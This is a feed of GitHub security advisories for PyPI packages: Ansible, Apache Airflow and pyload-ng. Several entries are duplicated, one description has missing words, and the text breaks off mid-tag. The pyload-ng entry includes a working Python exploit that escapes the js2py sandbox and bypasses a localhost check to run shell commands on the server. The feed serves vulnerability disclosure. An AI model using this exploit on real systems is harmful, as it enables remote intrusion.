{
    "version": "https://jsonfeed.org/version/1",
    "title": "Security Advisory for Python packages hosted at PyPI.org",
    "home_page_url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip",
    "feed_url": "https://azu.github.io/github-advisory-database-rss/pip.json",
    "description": "Security Advisory for Python packages hosted at PyPI.org on GitHub",
    "items": [
        {
            "content_html": "<p>In ansible it was found that inventory variables are loaded from current working directory when running ad-hoc command which are under attacker's control, allowing to run arbitrary code as a result.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2018-10874\">https://nvd.nist.gov/vuln/detail/CVE-2018-10874</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHBA-2018:3788\">https://access.redhat.com/errata/RHBA-2018:3788</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2150\">https://access.redhat.com/errata/RHSA-2018:2150</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2151\">https://access.redhat.com/errata/RHSA-2018:2151</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2152\">https://access.redhat.com/errata/RHSA-2018:2152</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2166\">https://access.redhat.com/errata/RHSA-2018:2166</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2321\">https://access.redhat.com/errata/RHSA-2018:2321</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2585\">https://access.redhat.com/errata/RHSA-2018:2585</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2019:0054\">https://access.redhat.com/errata/RHSA-2019:0054</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10874\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10874</a></li>\n<li><a href=\"https://access.redhat.com/security/cve/CVE-2018-10874\">https://access.redhat.com/security/cve/CVE-2018-10874</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1596528\">https://bugzilla.redhat.com/show_bug.cgi?id=1596528</a></li>\n<li><a href=\"https://web.archive.org/web/20201130165946/http://www.securitytracker.com/id/1041396\">https://web.archive.org/web/20201130165946/http://www.securitytracker.com/id/1041396</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/42067\">https://github.com/ansible/ansible/pull/42067</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/44874addc7ea136f83c67d5869047ece02645fdb\">https://github.com/ansible/ansible/commit/44874addc7ea136f83c67d5869047ece02645fdb</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/1f80949f964a946773f9d3ac1899535bd2cc2b8e\">https://github.com/ansible/ansible/commit/1f80949f964a946773f9d3ac1899535bd2cc2b8e</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/10d6fe6c98cfee9a7be0fea6102ba5dec951aec7\">https://github.com/ansible/ansible/commit/10d6fe6c98cfee9a7be0fea6102ba5dec951aec7</a></li>\n<li><a href=\"https://usn.ubuntu.com/4072-1\">https://usn.ubuntu.com/4072-1</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2018-81.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2018-81.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-3xvg-x47j-x75w\">https://github.com/advisories/GHSA-3xvg-x47j-x75w</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-3xvg-x47j-x75w",
            "title": "[ansible] Ansible Improper Input Validation vulnerability",
            "date_modified": "2024-09-09T21:00:16.000Z",
            "date_published": "2022-05-13T01:07:34.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-3xvg-x47j-x75w"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>In ansible it was found that inventory variables are loaded from current working directory when running ad-hoc command which are under attacker's control, allowing to run arbitrary code as a result.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2018-10874\">https://nvd.nist.gov/vuln/detail/CVE-2018-10874</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHBA-2018:3788\">https://access.redhat.com/errata/RHBA-2018:3788</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2150\">https://access.redhat.com/errata/RHSA-2018:2150</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2151\">https://access.redhat.com/errata/RHSA-2018:2151</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2152\">https://access.redhat.com/errata/RHSA-2018:2152</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2166\">https://access.redhat.com/errata/RHSA-2018:2166</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2321\">https://access.redhat.com/errata/RHSA-2018:2321</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2585\">https://access.redhat.com/errata/RHSA-2018:2585</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2019:0054\">https://access.redhat.com/errata/RHSA-2019:0054</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10874\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10874</a></li>\n<li><a href=\"https://access.redhat.com/security/cve/CVE-2018-10874\">https://access.redhat.com/security/cve/CVE-2018-10874</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1596528\">https://bugzilla.redhat.com/show_bug.cgi?id=1596528</a></li>\n<li><a href=\"https://web.archive.org/web/20201130165946/http://www.securitytracker.com/id/1041396\">https://web.archive.org/web/20201130165946/http://www.securitytracker.com/id/1041396</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/42067\">https://github.com/ansible/ansible/pull/42067</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/44874addc7ea136f83c67d5869047ece02645fdb\">https://github.com/ansible/ansible/commit/44874addc7ea136f83c67d5869047ece02645fdb</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/1f80949f964a946773f9d3ac1899535bd2cc2b8e\">https://github.com/ansible/ansible/commit/1f80949f964a946773f9d3ac1899535bd2cc2b8e</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/10d6fe6c98cfee9a7be0fea6102ba5dec951aec7\">https://github.com/ansible/ansible/commit/10d6fe6c98cfee9a7be0fea6102ba5dec951aec7</a></li>\n<li><a href=\"https://usn.ubuntu.com/4072-1\">https://usn.ubuntu.com/4072-1</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2018-81.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2018-81.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-3xvg-x47j-x75w\">https://github.com/advisories/GHSA-3xvg-x47j-x75w</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-3xvg-x47j-x75w",
            "title": "[ansible] Ansible Improper Input Validation vulnerability",
            "date_modified": "2024-09-09T21:00:16.000Z",
            "date_published": "2022-05-13T01:07:34.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-3xvg-x47j-x75w"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>In ansible it was found that inventory variables are loaded from current working directory when running ad-hoc command which are under attacker's control, allowing to run arbitrary code as a result.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2018-10874\">https://nvd.nist.gov/vuln/detail/CVE-2018-10874</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHBA-2018:3788\">https://access.redhat.com/errata/RHBA-2018:3788</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2150\">https://access.redhat.com/errata/RHSA-2018:2150</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2151\">https://access.redhat.com/errata/RHSA-2018:2151</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2152\">https://access.redhat.com/errata/RHSA-2018:2152</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2166\">https://access.redhat.com/errata/RHSA-2018:2166</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2321\">https://access.redhat.com/errata/RHSA-2018:2321</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2018:2585\">https://access.redhat.com/errata/RHSA-2018:2585</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2019:0054\">https://access.redhat.com/errata/RHSA-2019:0054</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10874\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10874</a></li>\n<li><a href=\"https://access.redhat.com/security/cve/CVE-2018-10874\">https://access.redhat.com/security/cve/CVE-2018-10874</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1596528\">https://bugzilla.redhat.com/show_bug.cgi?id=1596528</a></li>\n<li><a href=\"https://web.archive.org/web/20201130165946/http://www.securitytracker.com/id/1041396\">https://web.archive.org/web/20201130165946/http://www.securitytracker.com/id/1041396</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/42067\">https://github.com/ansible/ansible/pull/42067</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/44874addc7ea136f83c67d5869047ece02645fdb\">https://github.com/ansible/ansible/commit/44874addc7ea136f83c67d5869047ece02645fdb</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/1f80949f964a946773f9d3ac1899535bd2cc2b8e\">https://github.com/ansible/ansible/commit/1f80949f964a946773f9d3ac1899535bd2cc2b8e</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/10d6fe6c98cfee9a7be0fea6102ba5dec951aec7\">https://github.com/ansible/ansible/commit/10d6fe6c98cfee9a7be0fea6102ba5dec951aec7</a></li>\n<li><a href=\"https://usn.ubuntu.com/4072-1\">https://usn.ubuntu.com/4072-1</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2018-81.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2018-81.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-3xvg-x47j-x75w\">https://github.com/advisories/GHSA-3xvg-x47j-x75w</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-3xvg-x47j-x75w",
            "title": "[ansible] Ansible Improper Input Validation vulnerability",
            "date_modified": "2024-09-09T21:00:16.000Z",
            "date_published": "2022-05-13T01:07:34.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-3xvg-x47j-x75w"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"summary\">Summary</h3>\n<p>Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately.</p>\n<h3 id=\"details\">Details</h3>\n<p>js2py has a vulnerability of sandbox escape assigned as <a href=\"https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape\">CVE-2024-28397</a>, which is used by the <code>/flash/addcrypted2</code> API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE.</p>\n<h3 id=\"poc\">PoC</h3>\n<p>The PoC is provided as <code>poc.py</code> below, you can modify the shell command it execute:</p>\n<pre><code class=\"language-python\">import socket\nimport base64\nfrom urllib.parse import quote\n\nhost, port = input(\"host: \"), int(input(\"port: \"))\n\npayload = \"\"\"\n// [+] command goes here:\nlet cmd = \"head -n 1 /etc/passwd; calc; gnome-calculator;\"\nlet hacked, bymarve, n11\nlet getattr, obj\n\nhacked = Object.getOwnPropertyNames({})\nbymarve = hacked.__getattribute__\nn11 = bymarve(\"__getattribute__\")\nobj = n11(\"__class__\").__base__\ngetattr = obj.__getattribute__\n\nfunction findpopen(o) {\n    let result;\n    for(let i in o.__subclasses__()) {\n        let item = o.__subclasses__()[i]\n        if(item.__module__ == \"subprocess\" &amp;&amp; item.__name__ == \"Popen\") {\n            return item\n        }\n        if(item.__name__ != \"type\" &amp;&amp; (result = findpopen(item))) {\n            return result\n        }\n    }\n}\n\nn11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()\nconsole.log(n11)\nfunction f() {\n    return n11\n}\n\n\"\"\"\n\ncrypted_b64 = base64.b64encode(b\"1234\").decode()\n\ndata = f\"package=pkg&amp;crypted={quote(crypted_b64)}&amp;jk={quote(payload)}\"\n\nrequest = f\"\"\"\\\nPOST /flash/addcrypted2 HTTP/1.1\nHost: 127.0.0.1:9666\nContent-Type: application/x-www-form-urlencoded\nContent-Length: {len(data)}\n\n{data}\n\"\"\".encode().replace(b\"\\n\", b\"\\r\\n\")\n\ndef main():\n\n    s = socket.socket()\n    s.connect((host, port))\n\n    s.send(request)\n    response = s.recv(1024).decode()\n    print(response)\n\nif __name__ == \"__main__\":\n    main()\n\n</code></pre>\n<h3 id=\"impact\">Impact</h3>\n<p>Anyone who runs the latest version (&lt;=0.5.0b3.dev85) of  pyload-ng under python3.11 or below. pyload-ng doesn't use js2py for python3.12 or above.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r\">https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r</a></li>\n<li><a href=\"https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape\">https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-h95x-26f3-88hr\">https://github.com/advisories/GHSA-h95x-26f3-88hr</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r9pp-r4xf-597r\">https://github.com/advisories/GHSA-r9pp-r4xf-597r</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r9pp-r4xf-597r",
            "title": "[pyload-ng] pyload-ng vulnerable to RCE with js2py sandbox escape",
            "date_modified": "2024-09-09T18:17:21.000Z",
            "date_published": "2024-09-09T18:17:20.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r9pp-r4xf-597r"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Example DAG: example_inlet_event_extra.py shipped with Apache Airflow version 2.10.0 has a vulnerability that allows an authenticated attacker with only DAG trigger permission to execute arbitrary commands. If you used that example as the base of your DAGs - please review if you have not copied the dangerous example; see  <a href=\"https://github.com/apache/airflow/pull/41873\">https://github.com/apache/airflow/pull/41873</a> &nbsp;for more information. We recommend against exposing the example DAGs in your deployment. If you must expose the example DAGs, upgrade Airflow to version 2.10.1 or later.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-45498\">https://nvd.nist.gov/vuln/detail/CVE-2024-45498</a></li>\n<li><a href=\"https://github.com/apache/airflow/pull/41873\">https://github.com/apache/airflow/pull/41873</a></li>\n<li><a href=\"https://lists.apache.org/thread/tl7lzczcqdmqj2pcpbvtjdpd2tb9561n\">https://lists.apache.org/thread/tl7lzczcqdmqj2pcpbvtjdpd2tb9561n</a></li>\n<li><a href=\"https://github.com/apache/airflow/commit/09ec2616568f8a18e0d5fe408110fae06ddf748f\">https://github.com/apache/airflow/commit/09ec2616568f8a18e0d5fe408110fae06ddf748f</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-c392-whpc-vfpr\">https://github.com/advisories/GHSA-c392-whpc-vfpr</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-c392-whpc-vfpr",
            "title": "[apache-airflow] Apache Airflow vulnerable to Improper Encoding or Escaping of Output",
            "date_modified": "2024-09-09T18:17:01.000Z",
            "date_published": "2024-09-07T09:30:31.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-c392-whpc-vfpr"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Apache Airflow versions before 2.10.1 have a vulnerability that allows&nbsp;DAG authors to add local settings to the DAG folder and get it executed by the scheduler, where the scheduler is not supposed to execute code submitted by the DAG author. \nUsers are advised to upgrade to version 2.10.1 or later, which has fixed the vulnerability.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-45034\">https://nvd.nist.gov/vuln/detail/CVE-2024-45034</a></li>\n<li><a href=\"https://github.com/apache/airflow/pull/41672\">https://github.com/apache/airflow/pull/41672</a></li>\n<li><a href=\"https://lists.apache.org/thread/b4fcw33vh60yfg9990n5vmc7sy2dcgjx\">https://lists.apache.org/thread/b4fcw33vh60yfg9990n5vmc7sy2dcgjx</a></li>\n<li><a href=\"https://github.com/apache/airflow/commit/03e01e76d2203d37aa645096df195b4328665f6d\">https://github.com/apache/airflow/commit/03e01e76d2203d37aa645096df195b4328665f6d</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-92xg-gmrq-5c3w\">https://github.com/advisories/GHSA-92xg-gmrq-5c3w</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-92xg-gmrq-5c3w",
            "title": "[apache-airflow] Apache Airflow vulnerable to Execution with Unnecessary Privileges",
            "date_modified": "2024-09-09T18:16:45.000Z",
            "date_published": "2024-09-07T09:30:31.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-92xg-gmrq-5c3w"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when using modules which decrypts vault files such as assemble, script, unarchive, win_copy, aws_s3 or copy modules. The temporary directory is created in /tmp leaves the s ts unencrypted. On Operating Systems which /tmp is not a tmpfs but part of the root partition, the directory is only cleared on boot and the decryp emains when the host is switched off. The system will be vulnerable when the system is not running. So decrypted data must be cleared as soon as possible and the data which normally is encrypted ble.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-10685\">https://nvd.nist.gov/vuln/detail/CVE-2020-10685</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/68433\">https://github.com/ansible/ansible/pull/68433</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10685\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10685</a></li>\n<li><a href=\"https://security.gentoo.org/glsa/202006-11\">https://security.gentoo.org/glsa/202006-11</a></li>\n<li><a href=\"https://www.debian.org/security/2021/dsa-4950\">https://www.debian.org/security/2021/dsa-4950</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/4e1fe80e681fa466626e9dea53efe6b0253ea1b2\">https://github.com/ansible/ansible/commit/4e1fe80e681fa466626e9dea53efe6b0253ea1b2</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/51d2514753544a9d58cd7524e27e696b2c944fb5\">https://github.com/ansible/ansible/commit/51d2514753544a9d58cd7524e27e696b2c944fb5</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/e1273b6faf036ed84e4f4edee85b888a4e256aee\">https://github.com/ansible/ansible/commit/e1273b6faf036ed84e4f4edee85b888a4e256aee</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-77g3-3j5w-64w4\">https://github.com/advisories/GHSA-77g3-3j5w-64w4</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-1.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-1.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-77g3-3j5w-64w4",
            "title": "[ansible] Exposure of Resource to Wrong Sphere and Insecure Temporary File in Ansible",
            "date_modified": "2024-09-06T20:16:43.000Z",
            "date_published": "2021-04-07T20:36:46.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-77g3-3j5w-64w4"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when using modules which decrypts vault files such as assemble, script, unarchive, win_copy, aws_s3 or copy modules. The temporary directory is created in /tmp leaves the s ts unencrypted. On Operating Systems which /tmp is not a tmpfs but part of the root partition, the directory is only cleared on boot and the decryp emains when the host is switched off. The system will be vulnerable when the system is not running. So decrypted data must be cleared as soon as possible and the data which normally is encrypted ble.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-10685\">https://nvd.nist.gov/vuln/detail/CVE-2020-10685</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/68433\">https://github.com/ansible/ansible/pull/68433</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10685\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10685</a></li>\n<li><a href=\"https://security.gentoo.org/glsa/202006-11\">https://security.gentoo.org/glsa/202006-11</a></li>\n<li><a href=\"https://www.debian.org/security/2021/dsa-4950\">https://www.debian.org/security/2021/dsa-4950</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/4e1fe80e681fa466626e9dea53efe6b0253ea1b2\">https://github.com/ansible/ansible/commit/4e1fe80e681fa466626e9dea53efe6b0253ea1b2</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/51d2514753544a9d58cd7524e27e696b2c944fb5\">https://github.com/ansible/ansible/commit/51d2514753544a9d58cd7524e27e696b2c944fb5</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/e1273b6faf036ed84e4f4edee85b888a4e256aee\">https://github.com/ansible/ansible/commit/e1273b6faf036ed84e4f4edee85b888a4e256aee</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-77g3-3j5w-64w4\">https://github.com/advisories/GHSA-77g3-3j5w-64w4</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-1.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-1.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-77g3-3j5w-64w4",
            "title": "[ansible] Exposure of Resource to Wrong Sphere and Insecure Temporary File in Ansible",
            "date_modified": "2024-09-06T20:16:43.000Z",
            "date_published": "2021-04-07T20:36:46.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-77g3-3j5w-64w4"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when using modules which decrypts vault files such as assemble, script, unarchive, win_copy, aws_s3 or copy modules. The temporary directory is created in /tmp leaves the s ts unencrypted. On Operating Systems which /tmp is not a tmpfs but part of the root partition, the directory is only cleared on boot and the decryp emains when the host is switched off. The system will be vulnerable when the system is not running. So decrypted data must be cleared as soon as possible and the data which normally is encrypted ble.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-10685\">https://nvd.nist.gov/vuln/detail/CVE-2020-10685</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/68433\">https://github.com/ansible/ansible/pull/68433</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10685\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10685</a></li>\n<li><a href=\"https://security.gentoo.org/glsa/202006-11\">https://security.gentoo.org/glsa/202006-11</a></li>\n<li><a href=\"https://www.debian.org/security/2021/dsa-4950\">https://www.debian.org/security/2021/dsa-4950</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/4e1fe80e681fa466626e9dea53efe6b0253ea1b2\">https://github.com/ansible/ansible/commit/4e1fe80e681fa466626e9dea53efe6b0253ea1b2</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/51d2514753544a9d58cd7524e27e696b2c944fb5\">https://github.com/ansible/ansible/commit/51d2514753544a9d58cd7524e27e696b2c944fb5</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/e1273b6faf036ed84e4f4edee85b888a4e256aee\">https://github.com/ansible/ansible/commit/e1273b6faf036ed84e4f4edee85b888a4e256aee</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-77g3-3j5w-64w4\">https://github.com/advisories/GHSA-77g3-3j5w-64w4</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-1.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-1.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-77g3-3j5w-64w4",
            "title": "[ansible] Exposure of Resource to Wrong Sphere and Insecure Temporary File in Ansible",
            "date_modified": "2024-09-06T20:16:43.000Z",
            "date_published": "2021-04-07T20:36:46.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-77g3-3j5w-64w4"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in the solaris_zone module from the Ansible Community modules. When setting the name for the zone on the Solaris host, the zone name is checked by listing the process with the 'ps' bare command on the remote machine. An attacker could take advantage of this flaw by crafting the name of the zone and executing arbitrary commands in the remote host. Ansible Engine 2.7.15, 2.8.7, and 2.9.2 as well as previous versions are affected.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2019-14904\">https://nvd.nist.gov/vuln/detail/CVE-2019-14904</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/65686\">https://github.com/ansible/ansible/pull/65686</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1776944\">https://bugzilla.redhat.com/show_bug.cgi?id=1776944</a></li>\n<li><a href=\"https://lists.debian.org/debian-lts-announce/2021/01/msg00023.html\">https://lists.debian.org/debian-lts-announce/2021/01/msg00023.html</a></li>\n<li><a href=\"https://www.debian.org/security/2021/dsa-4950\">https://www.debian.org/security/2021/dsa-4950</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/589a415f887b6f2bb65cd07fe6b2e9d0a8156b69\">https://github.com/ansible/ansible/commit/589a415f887b6f2bb65cd07fe6b2e9d0a8156b69</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/6a86650109b8654f5898369e45d3857624edf907\">https://github.com/ansible/ansible/commit/6a86650109b8654f5898369e45d3857624edf907</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/a1b0f72c98b4b2afaab8aafa255e82c2075049c8\">https://github.com/ansible/ansible/commit/a1b0f72c98b4b2afaab8aafa255e82c2075049c8</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-gwr8-5j83-483c\">https://github.com/advisories/GHSA-gwr8-5j83-483c</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-161.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-161.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-gwr8-5j83-483c",
            "title": "[ansible] OS Command Injection and Improper Input Validation in ansible",
            "date_modified": "2024-09-06T20:14:43.000Z",
            "date_published": "2021-04-20T16:44:22.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-gwr8-5j83-483c"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in the solaris_zone module from the Ansible Community modules. When setting the name for the zone on the Solaris host, the zone name is checked by listing the process with the 'ps' bare command on the remote machine. An attacker could take advantage of this flaw by crafting the name of the zone and executing arbitrary commands in the remote host. Ansible Engine 2.7.15, 2.8.7, and 2.9.2 as well as previous versions are affected.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2019-14904\">https://nvd.nist.gov/vuln/detail/CVE-2019-14904</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/65686\">https://github.com/ansible/ansible/pull/65686</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1776944\">https://bugzilla.redhat.com/show_bug.cgi?id=1776944</a></li>\n<li><a href=\"https://lists.debian.org/debian-lts-announce/2021/01/msg00023.html\">https://lists.debian.org/debian-lts-announce/2021/01/msg00023.html</a></li>\n<li><a href=\"https://www.debian.org/security/2021/dsa-4950\">https://www.debian.org/security/2021/dsa-4950</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/589a415f887b6f2bb65cd07fe6b2e9d0a8156b69\">https://github.com/ansible/ansible/commit/589a415f887b6f2bb65cd07fe6b2e9d0a8156b69</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/6a86650109b8654f5898369e45d3857624edf907\">https://github.com/ansible/ansible/commit/6a86650109b8654f5898369e45d3857624edf907</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/a1b0f72c98b4b2afaab8aafa255e82c2075049c8\">https://github.com/ansible/ansible/commit/a1b0f72c98b4b2afaab8aafa255e82c2075049c8</a></li>\n<li><a 